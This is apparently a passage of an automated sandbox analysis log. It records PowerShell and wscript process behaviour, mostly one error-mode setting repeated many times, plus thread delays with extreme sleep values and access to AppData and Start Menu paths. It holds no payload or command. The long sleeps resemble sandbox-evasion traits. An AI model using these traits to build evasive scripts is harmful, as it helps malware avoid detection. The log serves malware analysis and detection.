          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4500Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5180Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4137Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5692Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5777Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3996Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776Thread sleep time: -15679732462653109s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632Thread sleep count: 4137 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632Thread sleep count: 5692 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7668Thread sleep time: -16602069666338586s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8120Thread sleep time: -7378697629483816s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
